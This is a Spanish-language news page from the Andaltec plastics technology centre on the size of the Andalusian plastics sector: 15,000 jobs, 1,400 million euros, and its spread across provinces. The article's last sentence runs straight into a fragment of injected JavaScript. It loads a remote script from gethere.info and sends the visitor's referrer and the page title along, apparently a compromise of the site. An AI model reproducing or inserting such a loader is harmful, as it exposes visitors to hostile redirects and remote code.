Andaltec
Copyright Andaltec
El sector del plástico genera 15.000 puestos de trabajo y 1.400 millones de euros en Andalucía - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
347
post-template-default,single,single-post,postid-347,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

El sector del plástico genera 15.000 puestos de trabajo y 1.400 millones de euros en Andalucía

El sector del plástico genera 15.000 puestos de trabajo y 1.400 millones de euros en Andalucía

El sector del plástico genera más de 15.000 puestos de trabajo directos e indirectos en la comunidad andaluza y factura 1.400 millones de euros, según datos facilitados por el Centro Tecnológico del Plástico de Andalucía (Andaltec). Estas cifras ponen de relieve la importancia del sector en la comunidad, debido al elevado número de empleos que sostiene y por la gran cantidad de empresas que trabajan directamente en la fabricación de productos de plástico y caucho, en torno a 700. Estos datos incluyen a empresas transformadoras del plástico en piezas, ingenierías de desarrollo, suministradores de medios y periféricos, empresas que incorporan el plástico en su producto para abaratar costes y las firmas de reciclado y recuperación de residuos plásticos.

En cuanto a la distribución territorial, la provincia de Jaén es la que cuenta con un mayor número de empleos en el sector del plástico, pues alberga firmas muy importantes dedicadas a la fabricación de componentes para el sector de la automoción y envases. En este sentido, alrededor del 34% del empleo directo generado por el sector se localiza en la provincia de Jaén. Por otra parte, Sevillla es la provincia que cuenta con mayor número de empresas del sector del plástico. También hay una presencia importante de empresas del sector del plástico en provincias como Málaga, Córdoba y Granada.

Las empresas del sector del plástico existentes en Andalucía se dedican a la fabricación de todo tipo de productos, desde componentes para automóviles, mallas para la agricultura, envases para alimentos, bolsas o etiquetas, a lo que hay que sumar el empleo que generan empresas especializadas en Ingeniería, moldistas, proveedores de calibres de control, de periféricos o reciclado y recuperación de residuos plásticos.

El gerente de Andaltec, José María Navarro, pone de relieve que, a nivel de empleo, no están sufriendo tanto la crisis las empresas que desarrollan productos de gran tamaño y consumo doméstico o aquellas que incorporan innovación y tecnología en el producto. “En general, el sector está soportando mejor esta complicada situación económica debido a su apuesta por la exportación a países que están en mejor situación económica que España”, destaca. En la actualidad, Andaltec está ayudando a las empresas andaluzas, incluso ajenas al cluster del plástico, a mantener empleos transfiriendo la tecnología necesaria que les permita sacar al mercado productos competitivos, es decir, innovadores y con gran tirada. «Estamos hablando de envases inteligentes, productos biodegradables o biocompostables, o de actividades centradas en la recuperación de residuos”, sostiene Navarro.

Estos datos revelan la importancia del trabajo del Centro Tecnológico del Plástico, una entidad de referencia para toda Andalucía y que está catalogado como Centro Tecnológico Nacional. En este sentido, Navarro recuerda que, aparte de la generación de los más de 75 empleos propios,  “Andaltec se ocupa de ofrecer servicios a empresas andaluzas para mejorar sus productos, reducir sus costes y ganar en competitividad, con el objetivo último de mantener y hacer crecer el nivel de empleo en Andalucía”, señala. Hay que añadir que hay proyectos en los que ha intervenido Andaltec que también han propiciado el nacimiento de nuevas empresas.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;